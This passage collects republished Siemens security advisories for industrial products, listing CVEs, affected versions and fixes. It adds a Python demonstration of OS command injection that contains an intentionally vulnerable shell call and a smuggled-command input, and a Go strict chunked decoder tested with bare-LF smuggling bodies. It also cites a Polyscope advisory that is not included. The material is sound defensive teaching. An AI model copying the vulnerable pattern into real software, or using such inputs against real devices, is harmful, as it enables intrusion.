CVSS v3: 7.5
Vendor: Siemens
Equipment: Siemens Ruggedcom Rox
Vulnerabilities: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2025-40947
Affected devices do not properly sanitize user-supplied input during the feature key installation process. This could allow an authenticated remote attacker to inject arbitrary commands, resulting in remote code execution with root privileges on the underlying operating system.
Affected products: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 (vendor: Siemens; status: known_affected)
Remediation: update to V2.17.1 or later (https://support.industry.siemens.com/cs/ww/en/view/110002017/)
CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSS v3.1: 7.5 HIGH (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

Acknowledgments
Emmanuel Zhou, Rick Wyble, Mehemt Balta, and Adam Robbie of Palo Alto Networks OT Threat Research Lab reported this vulnerability to Siemens. Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at https://www.siemens.com/industrialsecurity.

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed at https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-078743 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. It is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
2026-05-12, revision 1: Publication Date
2026-05-14, revision 2: Initial CISA Republication of Siemens ProductCERT SSA-078743 advisory
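
Both CVE-2025-40947 above (an authenticated operator's feature-key input reaching a root shell on ROX) and CVE-2026-8153 in the Universal Robots Polyscope 5 advisory (unauthenticated input to the Dashboard Server) are CWE-78. Neither advisory describes the real command format or the vulnerable code, so the following is an added example, not Siemens, Universal Robots or CISA code: the key format, the `installer` stand-in, the function names and the payload are constructed for the demonstration, and `printf` stands in for the privileged installer so that running it changes nothing on the host.

```python
"""Added example: an operator-supplied value that reaches a shell, vulnerable and hardened.

Constructed demonstration of CWE-78 for CVE-2025-40947 and CVE-2026-8153; it does not
reproduce either product's code. `printf` stands in for the privileged installer.
"""
import re
import shlex
import subprocess

# Constructed allow-list for the value: the narrowest shape the application can accept.
_KEY_FORMAT = re.compile(r"[A-Z0-9]{4}(-[A-Z0-9]{4}){3}")


def install_key_vulnerable(key: str) -> str:
    """Command text built from the input and handed to a shell: metacharacters are parsed."""
    cmd = f"printf 'installing %s\\n' {key}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def install_key_quoted(key: str) -> str:
    """Partial fix for code that must keep building a command string: quote the data."""
    cmd = f"printf 'installing %s\\n' {shlex.quote(key)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def install_key_hardened(key: str) -> str:
    """Validate against the allow-list, then pass the value as data, never as command text.

    The value travels as a positional parameter ($1); the command text itself is a constant,
    so there is nothing in it for a shell to re-parse whatever the value contains.
    """
    if not _KEY_FORMAT.fullmatch(key):
        raise ValueError("feature key does not match the expected format")
    argv = ["sh", "-c", 'printf "installing %s\\n" "$1"', "installer", key]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    good = "AAAA-BBBB-CCCC-DDDD"
    evil = good + "; echo INJECTED"      # constructed payload: a second command after ';'
    print("vulnerable:", repr(install_key_vulnerable(evil)))
    print("quoted:    ", repr(install_key_quoted(evil)))
    print("hardened:  ", repr(install_key_hardened(good)))
    try:
        install_key_hardened(evil)
    except ValueError as exc:
        print("hardened:   rejected ->", exc)
```

The vulnerable variant runs the injected `echo` as a second command; the quoted variant keeps the whole value as one argument but still depends on every call site remembering to quote; the hardened variant refuses the value before any process is started and, even if the allow-list were loosened, never lets the value become part of the command text. The same structure applies whether the value arrives through an authenticated management interface, as on ROX, or through an unauthenticated network listener, as on the Polyscope Dashboard Server.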

Siemens Teamcenter

Summary
Siemens Teamcenter is affected by multiple vulnerabilities which could lead to a compromise of availability, integrity and confidentiality. Siemens has released new versions for the affected products and recommends updating to the latest versions.

Affected versions (ranges per release line, with the CVEs each range covers, taken from the fixed builds named in the CVE entries below):
Teamcenter V2312: < 2312.0014 (vers:intdot/<2312.0014) for CVE-2026-33862 and CVE-2026-33893; < 2312.0009 (vers:intdot/<2312.0009) for CVE-2024-4367
Teamcenter V2406: < 2406.0012 (vers:intdot/<2406.0012) for CVE-2026-33862 and CVE-2026-33893; < 2406.0006 (vers:intdot/<2406.0006) for CVE-2024-4367
Teamcenter V2412: < 2412.0009 (vers:intdot/<2412.0009) for CVE-2026-33862 and CVE-2026-33893
Teamcenter V2506: < 2506.0005 (vers:intdot/<2506.0005) for CVE-2026-33862 and CVE-2026-33893
Teamcenter V2512: all versions (vers:all/*); no fixed build for this line is listed in the advisory
CVSS v3: 7.5
Vendor: Siemens
Equipment: Siemens Teamcenter
Vulnerabilities: Improper Check for Unusual or Exceptional Conditions, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Use of Hard-coded Credentials

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2024-4367
A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.
Affected products: Teamcenter V2312, Teamcenter V2406 (vendor: Siemens; status: known_affected, known_not_affected)
Remediation: update to V2312.0009 or later, or to V2406.0006 or later (https://support.sw.siemens.com/product/282219420/)
CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions
CVSS v3.1: 5.6 MEDIUM (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

CVE-2026-33862
The affected application does not properly encode or filter user-supplied data. This could allow an attacker to inject malicious code that is executed by other users when they visit the affected page.
Affected products: Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506 (vendor: Siemens; status: known_affected, known_not_affected)
Remediation: update to V2312.0014, V2406.0012, V2412.0009 or V2506.0005 or later, according to the release line in use (https://support.sw.siemens.com/product/282219420/)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS v3.1: 7.3 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N)

CVE-2026-33893
The affected application contains a hard-coded key, used for obfuscation, stored directly in the application. This could allow an attacker to obtain the key and misuse it to gain unauthorized access.
Affected products: Teamcenter V2312, Teamcenter V2406, Teamcenter V2412, Teamcenter V2506 (vendor: Siemens; status: known_affected, known_not_affected)
Remediation: update to V2312.0014, V2406.0012, V2412.0009 or V2506.0005 or later, according to the release line in use (https://support.sw.siemens.com/product/282219420/)
CWE: CWE-798 Use of Hard-coded Credentials
CVSS v3.1: 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Acknowledgments
Dustin Born, Robin Plugge, and Tim Wörner of usd AG reported these vulnerabilities.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at https://www.siemens.com/industrialsecurity.

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed at https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-827383 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory.
This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-827383 advisory Legal Notice and Terms of Use

Siemens Solid Edge

Summary
Solid Edge SE2026 before Update 5 is affected by two file parsing vulnerabilities that could be triggered when the application reads specially crafted files in PAR format. This could allow an attacker to crash the application or execute arbitrary code. Siemens has released a new version for Solid Edge SE2026 and recommends updating to the latest version.

The following versions of Siemens Solid Edge are affected:
- Solid Edge: vers:intdot/<226.0.5

CVSS v3: 7.8
Vendor: Siemens
Equipment: Siemens Solid Edge
Vulnerabilities: Access of Uninitialized Pointer, Stack-based Buffer Overflow

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-44411
The affected application is vulnerable to uninitialized pointer access while parsing specially crafted PAR files. An attacker could leverage this vulnerability to execute code in the context of the current process.
Affected Products: Siemens Solid Edge (Vendor: Siemens)
Product Version: Solid Edge
Product Status: known_affected
Remediations:
- Vendor fix: Update to V226.0 Update 5 or later version (https://support.sw.siemens.com/product/246738425/)
Relevant CWE: CWE-824 Access of Uninitialized Pointer
Metrics: CVSS 3.1 base score 7.8 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2026-44412
The affected applications contain a stack-based overflow vulnerability while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.
Affected Products: Siemens Solid Edge (Vendor: Siemens)
Product Version: Solid Edge
Product Status: known_affected
Remediations:
- Vendor fix: Update to V226.0 Update 5 or later version (https://support.sw.siemens.com/product/246738425/)
Relevant CWE: CWE-121 Stack-based Buffer Overflow
Metrics: CVSS 3.1 base score 7.8 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Acknowledgments
Michael Heinzl reported these vulnerabilities.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-921111 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory.

Revision History
Initial Release Date: 2026-05-12
- 2026-05-12, Revision 1: Publication Date
- 2026-05-13, Revision 2: Fixed error in title with the change from SE225 to SE226
- 2026-05-14, Revision 3: Initial CISA Republication of Siemens ProductCERT SSA-921111 advisory

Siemens SENTRON 7KT PAC1261 Data Manager

Summary
The web server in SENTRON 7KT PAC1261 Data Manager before V2.1.0 contains a request smuggling vulnerability in the Go Project's net/http package that could allow an attacker to retrieve authorization tokens that can be used to gain administrative control over the device. Siemens has released a new version for SENTRON 7KT PAC1261 Data Manager and recommends updating to the latest version.

The following versions of Siemens SENTRON 7KT PAC1261 Data Manager are affected:
- SENTRON 7KT PAC1261 Data Manager: vers:intdot/<2.1.0

CVSS v3: 9.1
Vendor: Siemens
Equipment: Siemens SENTRON 7KT PAC1261 Data Manager
Vulnerabilities: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Background
Critical Infrastructure Sectors: Energy
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2025-22871
The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.
Affected Products: Siemens SENTRON 7KT PAC1261 Data Manager (Vendor: Siemens)
Product Version: SENTRON 7KT PAC1261 Data Manager
Product Status: known_affected
Remediations:
- Mitigation: Use encrypted protocols
- Vendor fix: Update to V2.1.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109977717/)
Relevant CWE: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
Metrics: CVSS 3.1 base score 9.1 (CRITICAL), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-783943 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory.

Revision History
Initial Release Date: 2026-05-12
- 2026-05-12, Revision 1: Publication Date
- 2026-05-14, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-783943 advisory
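The CVE-2025-22871 entry in the SENTRON advisory above turns on one parsing detail: whether a chunk-size line may end in a bare LF rather than CRLF. The Go program below is an added example written for this page, not Go's net/http or any Siemens code; it decodes a chunked body but rejects every chunk-size line that is not CRLF-terminated, so it cannot disagree with a more lenient component in the same request path about where a chunk starts. The sample bodies are constructed inline, and trailer fields are assumed absent.

```go
package main

import (
	"bufio"
	"bytes"
	"errors"
	"fmt"
	"io"
)

// ErrBareLF: chunk-size line not CRLF-terminated; CVE-2025-22871 accepted a bare LF here.
var ErrBareLF = errors.New("chunked: chunk-size line must end in CRLF")

// readChunkSizeLine reads one chunk-size line ("1*HEXDIG [chunk-ext] CRLF") and returns
// the size. A bare LF in the digits or inside a chunk-ext fails closed, not as a terminator.
func readChunkSizeLine(br *bufio.Reader) (uint64, error) {
	line, err := br.ReadSlice('\n') // bufio.ErrBufferFull (over-long line) also lands here
	if err != nil {
		return 0, err
	}
	if len(line) < 2 || line[len(line)-2] != '\r' {
		return 0, ErrBareLF
	}
	line = line[:len(line)-2] // drop CRLF
	if i := bytes.IndexByte(line, ';'); i >= 0 {
		line = line[:i] // chunk-ext is not interpreted, only required to be CRLF-terminated
	}
	line = bytes.TrimRight(line, " \t") // tolerate BWS before ';'
	if len(line) == 0 {
		return 0, errors.New("chunked: empty chunk size")
	}
	var n uint64
	for _, c := range line {
		var d byte
		switch {
		case '0' <= c && c <= '9':
			d = c - '0'
		case 'a' <= c && c <= 'f':
			d = c - 'a' + 10
		case 'A' <= c && c <= 'F':
			d = c - 'A' + 10
		default:
			return 0, fmt.Errorf("chunked: invalid chunk-size byte %q", c)
		}
		if n >= 1<<60 { // the next shift would overflow
			return 0, errors.New("chunked: chunk size too large")
		}
		n = n<<4 | uint64(d)
	}
	return n, nil
}

// expectCRLF consumes the CRLF that must follow chunk data and the last-chunk.
func expectCRLF(br *bufio.Reader) error {
	var crlf [2]byte
	if _, err := io.ReadFull(br, crlf[:]); err != nil {
		return err
	}
	if crlf != [2]byte{'\r', '\n'} {
		return fmt.Errorf("chunked: expected CRLF, got %q", crlf[:])
	}
	return nil
}

// DecodeChunked decodes a complete chunked body strictly; assumes no trailer fields ("0\r\n\r\n" ends it).
func DecodeChunked(body []byte) ([]byte, error) {
	br := bufio.NewReader(bytes.NewReader(body))
	var out bytes.Buffer
	for {
		size, err := readChunkSizeLine(br)
		if err != nil {
			return nil, err
		}
		if size == 0 {
			if err := expectCRLF(br); err != nil {
				return nil, err
			}
			return out.Bytes(), nil
		}
		if _, err := io.CopyN(&out, br, int64(size)); err != nil { // short input -> io.EOF
			return nil, err
		}
		if err := expectCRLF(br); err != nil {
			return nil, err
		}
	}
}

func main() {
	for _, body := range []string{ // constructed sample bodies, not captured traffic
		"5\r\nhello\r\n0\r\n\r\n",            // well-formed
		"5;name=value\r\nhello\r\n0\r\n\r\n", // well-formed with chunk-ext
		"5\nhello\r\n0\r\n\r\n",              // bare LF after size: rejected
		"5;ext\nAAAAA\r\n0\r\n\r\n",          // bare LF inside chunk-ext: rejected
	} {
		out, err := DecodeChunked([]byte(body))
		fmt.Printf("%q -> body=%q err=%v\n", body, out, err)
	}
}
```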

Siemens Opcenter RDnL

Summary
Opcenter RDnL is affected by missing authentication in a critical function in ‘ActiveMQ Artemis’. An unauthenticated attacker within the adjacent network could use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in availability impacts or message injection into any queue via the rogue broker. Breaking the integrity of a message has a low impact due to missing auto refresh functionality, and the messages do not contain any confidential information. ActiveMQ Artemis has released a new version and Siemens recommends updating to the latest version.

The following versions of Siemens Opcenter RDnL are affected:
- Opcenter RDnL: vers:all/*

CVSS v3: 7.1
Vendor: Siemens
Equipment: Siemens Opcenter RDnL
Vulnerabilities: Missing Authentication for Critical Function

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-27446
Missing Authentication for Critical Function (CWE-306) vulnerability in Apache Artemis, Apache ActiveMQ Artemis. An unauthenticated remote attacker can use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in message injection into any queue and/or message exfiltration from any queue via the rogue broker. This impacts environments that allow both:
- incoming Core protocol connections from untrusted sources to the broker
- outgoing Core protocol connections from the broker to untrusted targets
Affected Products: Siemens Opcenter RDnL (Vendor: Siemens)
Product Version: Opcenter RDnL
Product Status: known_affected
Remediations:
- Mitigation: Implement and deploy a Core interceptor to deny all Core downstream federation connect packets. Such packets have a type of (int) -16 or (byte) 0xfffffff0. Documentation for interceptors is available at https://artemis.apache.org/components/artemis/documentation/latest/intercepting-operations.html
- Mitigation: Remove Core protocol support from any acceptor receiving connections from untrusted sources. Incoming Core protocol connections are supported by default via the "artemis" acceptor listening on port 61616. See the "protocols" URL parameter configured for the acceptor. An acceptor URL without this parameter supports all protocols by default, including Core.
- Mitigation: Use two-way SSL (i.e. certificate-based authentication) in order to force every client to present the proper SSL certificate when establishing a connection, before any message protocol handshake is attempted. This will prevent unauthenticated exploitation of this vulnerability.
- Vendor fix: Update to Apache Artemis version 2.52.0 or later version
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS 3.1 base score 7.1 (HIGH), vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Acknowledgments
Siemens ProductCERT reported this vulnerability to CISA.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-085541 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory.

Revision History
Initial Release Date: 2026-05-12
- 2026-05-12, Revision 1: Publication Date
- 2026-05-14, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-085541 advisory

Siemens Ruggedcom Rox

Summary
Ruggedcom Rox contains an improper access control vulnerability that could allow an authenticated remote attacker to read arbitrary files with root privileges from the underlying operating system's filesystem. Siemens has released new versions for the affected products and recommends updating to the latest versions.

The following versions of Siemens Ruggedcom Rox are affected:
- RUGGEDCOM ROX MX5000: vers:intdot/<2.17.1
- RUGGEDCOM ROX MX5000RE: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1400: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1500: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1501: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1510: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1511: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1512: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1524: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX1536: vers:intdot/<2.17.1
- RUGGEDCOM ROX RX5000: vers:intdot/<2.17.1

CVSS v3: 6.8
Vendor: Siemens
Equipment: Siemens Ruggedcom Rox
Vulnerabilities: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2025-40948
Affected devices do not properly validate input in the web server's JSON-RPC interface. This could allow an authenticated remote attacker to read arbitrary files from the underlying operating system's filesystem with root privileges.
Affected Products: Siemens Ruggedcom Rox (Vendor: Siemens)
Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000
Product Status: known_affected
Remediations:
- Vendor fix: Update to V2.17.1 or later version (https://support.industry.siemens.com/cs/ww/en/view/110002017/)
Relevant CWE: CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
Metrics: CVSS 3.1 base score 6.8 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Acknowledgments
Emmanuel Zhou, Rick Wyble, Mehemt Balta, and Adam Robbie of Palo Alto Networks OT Threat Research Lab reported this vulnerability.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-973901 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory.

Revision History
Initial Release Date: 2026-05-12
- 2026-05-12, Revision 1: Publication Date
- 2026-05-14, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-973901 advisory

Siemens SIMATIC S7 PLC Web Server

Summary
SIMATIC S7 PLCs contain multiple vulnerabilities in the web server that could allow an attacker to perform cross-site scripting attacks. Siemens has released new versions for several affected products and recommends updating to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet, available.

The following versions of Siemens SIMATIC S7 PLC Web Server are affected:
- SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0): vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0): vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs: vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs: vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs: vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
